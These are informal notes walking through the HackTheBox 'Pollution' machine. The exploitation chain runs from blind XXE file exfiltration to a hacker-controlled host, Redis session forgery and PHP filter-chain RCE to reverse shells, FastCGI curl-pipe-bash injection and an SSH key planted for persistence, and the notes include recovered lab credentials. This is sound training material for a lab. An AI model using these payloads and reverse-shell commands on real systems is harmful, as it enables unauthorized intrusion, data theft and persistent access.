hackthebox pollution insane-526互联

start of namp

it's bannber tells us it's apache also running debian and more importatntly we get a php session cookie id back so chances are this is going to be a php website

let's go take a look at the page

roll to the deep and we find that is a collect.htb so we have a potential hostname

add it over to the hostfile

before spend too much time poking at the it ,we need to running the gobuster

cracking directory

gobuster -u http://10.10.11.192 -w /opt/Seclist/discovery/web-content/raft-small-words.txt -o root.gobuster

and we get the first error,it's trying to do a request to this uuid this changes every time and it's getting a 302 redirect and we find that once we enter the wrong second directory the website will redirect to the index page. we need to use -b to avoid these 404 and 302 respone code

gobuster -u http://10.10.11.192/ -w /opt/seclist/discovery/web-content/raft-smll-words.txt -o root.gobuster -b 404,302

while that goes let's examine other feartures of this site and go over to the register functionality and let's try registering ippsec with the password -- success

logging to the website

most the information is similar ,we can see a pollution api is showing on the website --find the API

this is one different from index page

as we know that this page have one api and we can take a look at the js code or page source code finding this api

so the next step is hit this api

go back to gobuster and check the directory

also start gobuster to crack the vhost of this box

gobuster vhost -u http://collect.htb -w /opt/seclist/discovery/DNS/subdomains-topmillion-5000.txt and we get a hit for a forum.collect.htb

go over it to the hosts file and visit this web

we get a message board and this looks like it is my bb an open source message board .we probably try to find out the version of it but we do have threads and post to read

so let's click the form to see if there's anything interesting

and we find that one file call proxy_history.txt is allowed to be download and give a look

when we access it ,it wants me to log in so lets register an account and use it log in.

downloading proxy_history and we get this burpsite file

copy is and put it in a text file

scroll down and see the base64 text .

echo -n xx | base64 -d to show origin text

it looks like the headers to the request

look back to the burpsuite file and respone text is under the label <response length> </responselength>

we find that is a label of url

we can grep the url and take a look the url inside this burpsuite req and res

grep url proxy_history.txt

we can see this http://collect.htb/set/role/admin and http://127.0.0.1:3000/auth/login

maybe there is a local web server on this box

let's search for collect.htb and look at the request text

decode the base64 text a

echo -n xxx | base64 -d

token=ddac62a28254561001277727cb397baf

maybe this token is the password to be able to set/role/admin.

lets recreate this request set/role/admin we're going to see if we can make ourselves an admin

1.go back to home page 2.access http://collect.htb/set/role/admin 3.make the reqeust

change the method of it ,add the token ,send this post request and we get the 302 code but redirect to /admin page

and we go to slash admin what's redirecting us ,we can see a direrent platform

lets just try the username and password which was resgiterd to log in and intercept this request

tips:the most important step for login page is intercept this login request and look at this package whether have vital message in it

it's going to the api so we finally hit the API of pollution

the problem is we can't get any data back so we can't just have this include a file

we need to make the sever make a request back to us,so let's google hacktricks xxe

we can use "blind" SSRF -exfiltrate data out-of-band

according to the exp step,improve each of them

1. touch www directory and vi external.dtd copy the payload below in it

modify some parameter like SYSTEM 'http://10.10.14.8:8000/

it hitting %exfiltrate triggers the system function and file is /etc/hostname

2.python -m http.server 8000

open a webserver

3.copy one standard xxe injection payload and paste it in request package

<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://10.10.14.8/external.dtd"> %xxe; ]>

4.send the request

it doesn't show up our hostname message (ERROR-1)

solution

maybe the hostname require us have some type of bad character,let's do a php convert

tips:penetration thought-- we can change different coding to show the text .(if one coding is bad,we can use phpbase64 function or other)

modify the DTD file funciton <!ENTITY % SYSTEM php://filter/convert.base64-encode/resource=/etc/hostname">

we can do this because the application itself is a php so if we make this base64 then it's going to be a lot more friendly to the url

resend the request (success)

look at the python log

we accquire a get request and show us a piece of base64 coding ,decode it and show pollution

but we need to get some susceptible message

modify reading file is /etc/passwd but we find that there is not any base64 coding but a original external.dtd file

the reason why we don't get anything from passwd is the file is too big .there is too many character in it and too long for url and error is out. so we can go for other file.

trying /etc/hosts file (find out whether have other subdomain we don't have)

we get back the content of hosts file by base64 encoding,decode it and find new host --developers.collect.htb

use script to easily get the interaction for the message of xxe injection

download script from https://github.com/ippsec/ctf-scripts/xxe/bind-xxe.py

just copy the whole burp request to a file and use -r to send it

xxe.req file

use script easliy get the message back

python xxe.py -r xxe.req # and enter the susceptible file

we can't get /etc/passwd because the length there is a php wrapper we could have zipped it up first

but we can first collect other message

1.get the apache conf file to check config

first is default file we can't get back

we do get a virtual host

also trying every domain we get

we get a virtual host as well

it show that authuserfiel is at /vat/www/developers/.htpasswd

we can access develop.collect.htb because this domain we find in victim /etc/hosts

it show up a login box and it meas we need to have a username ,password

we can use xxe.py look at the /var/www/developers/.htpasswd

we accquire a pair of username and password

utiliz hashcat crack this password

hashcat hashfile /opt/xxx/rockyou.txt (success)

so the username is developers_group the password is r0cket

get to another username and password

we don't have this user and passwd ,we can try week password or username but fail

use xxe lfi to get the /var/www/developer/index.php to check the code

it show that if we don't have the correct authentication we will redirect to login.php

use xxe lfi copy login.php source code out and look at it (fail)

use xxe lif copy bootstrap.php source code out and give a look(success)

so there is a redis server open at port 6379 and tell us auth is COLLECTR3D1SPASS ,we could try to login

redis login

redis-cli -h collect.htb　

collect.htb:6379> AUTH COLLECTR3D1SPASS

where we did the xml injection,there is a PHPSESSID cookit that begins with tkng

so if we use redis-cli get this cookie it's very similar to like a php serialized object where we have a username variable

introduction username is string type having 6 character. role is string type having 5 charater

this login.php website probably is multiple users that also use redis accout

we user f12 to see our cookie as a visitor and we find that cookie begins with d79fr

back to redis-cli and get the message from d79fr etc. (get the key it's blank)

set this cookie for a new accout,because we only satisfy one condition we can login

so set the auth eq 1

set PHPREDIS_SESSION:d79fr.....lop3 'auth|b:1;' or 'auth|s:5:"admin";'

visit http://developers.collect.htb/index.php (succes) it redirect to http://xx/?page=home　　

so cause it is a php website,we can use php://filter/convet.base64-encode/resource to get the file source code back with base64 coding

construt exp for retrieving the source code of login page with base64 coding

exp: http://developers.collect.htb/?page=php:/filter/conver.base64-encode/resouce=login

we get a output ,decode it.

tips: the base64 docoder say that these code are invalid. --we can also copy them from view-source page

decode them again ,we have login.php source code.at the meantime we get mysql login username and password

maybe there is not only lif loophole but also a gadget chain with php filter to put anything we want tin this

access ippsec.rocks and search for php filter code ( it show that we can use gadget chain with php filter to get a RCE)

visit github and search php_filter_chain_generator

git url : https://raw.githubusercontent.com/synacktiv/php_filter_chain_generator/main/php_filter_chain_generator.py

create a php rce exp for php filter RCE

python3 php_filter_chain_generator.py --chain <?php system($_REQUEST['cmd']);?> > exp.txt　　

and copy to burp request package

at last we add cmd to execute code (fail)

the reason why it can't execute curl cmd is we don't add the cmd parameter at lost

add a cmd key at last as a parameter and resend (success)

send a reverse shell cmd

cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.8:9001 0>&1' (ctrl u to url encode this cmd)

we get a shell

shell interactly improve

python -c 'import pty;pty.spawn("/bin/bash")' to improve #but echo as the command

solution

1.ctrl Z to stop control the shell

2.stty raw -echo;fg

stty raw -echo -- set the terminal in raw mode which is disabing echoing means that the characters typed by the user will not be displayed on the screen.
fg -- this command braings a suspended job to the foreground.ti's typically after suspending a preocess(ctrl Z) to resume its execution in the foreground.

3.export TERM=xterm

now we get a great interact shell

look at the open port

ss -pntl

utiliz grep cmd to sift file have 3000 and 9000

we find a /etc/php/8.1/fpm/pool.d/www.conf file is listening, cat it to see what it is

this file have many ';' character ,we use grep -v '^;'and grep '.' to sift the valid statement

we see that victor have the fpm process at the port 9000

since we can access 127.0.0.1 9000,we can inject php code into this project and get a shell as victor

we can google 'hacktrick fpm php'

the pricipal of this RCE

this understanding may not be correct

this whole pool manage workds by like apache sending it the php code for it to execute and what we are going to abuse is we can talk to the same socket that apache is and by giving apache this bash file we can prepend other code to it and we are going to prepend our payload

use python script is more easily to execute

create a file at /tmp and past the python script in it

python xx.py to see the grammer

python3 fcgi.py <?php system("bash -c \"bash -i > & -- when we want to enter to input it turn the cursor to the begining of the cmd

get a interatly shell (when we enter and automatically turning the cursor to begining of sentence)

1.stty -a

2.get to the box shell

stty rows 31 colums 121

use fastcgi.py to pretend a php code to the box localhost file

1.at the kali,we create a index.html with code bash -c 'bash -i >& /dev/tcp/10.10.14.8:9001 0>&1' and start a http server by python at port 8000

2.nc -lvnp 9001 at kali

3.python fcgi.py -c '<? php system("curl 10.10.14.8:8000 | bash");' localhost /var/www/developers/index.php

　　introduce: this exp is tell the fastcgi to pretend the php code to the /var/www/developers/index.php file and the vital step is curl the kali's http server file to revese the bash to attacker

we get a shell by user victor

go to the /home/victor directory to look up whether have susceptible file

also create a ssh authentication file for easily connect

ssh-keygen to create a authentication file

ssh-keygen -f victor
enter enter

create a key

create a pub file and victor key file

kali : python -m http.server 8080 to open a port for victim machine to curl this key file to .ssh/authorized_keys

victor 's shell :

1.curl http://10.10.14.8/victor.pub -o authorized_keys #this key file is typically attention to the privacy,must chmod 600 to this file

2.chmod 600 autho*

use ssh key file and dash i parameter to login ssh with certs

ssh -i victor victor@10.10.11.192 (success)

we still don't know what the service running on port 3000,at the meantime this shell is user shell not the root shell(need to escalate privilege),we can also look at something wether there have a running process is started by root

using ps -ef to search for root running process

we notice that this 1356 process is running by root and use node cmd to execute /root/pollution_api/index.js .we can utiliz this js file to escalate privilege.

cat the js file and notice this file is listen on 3000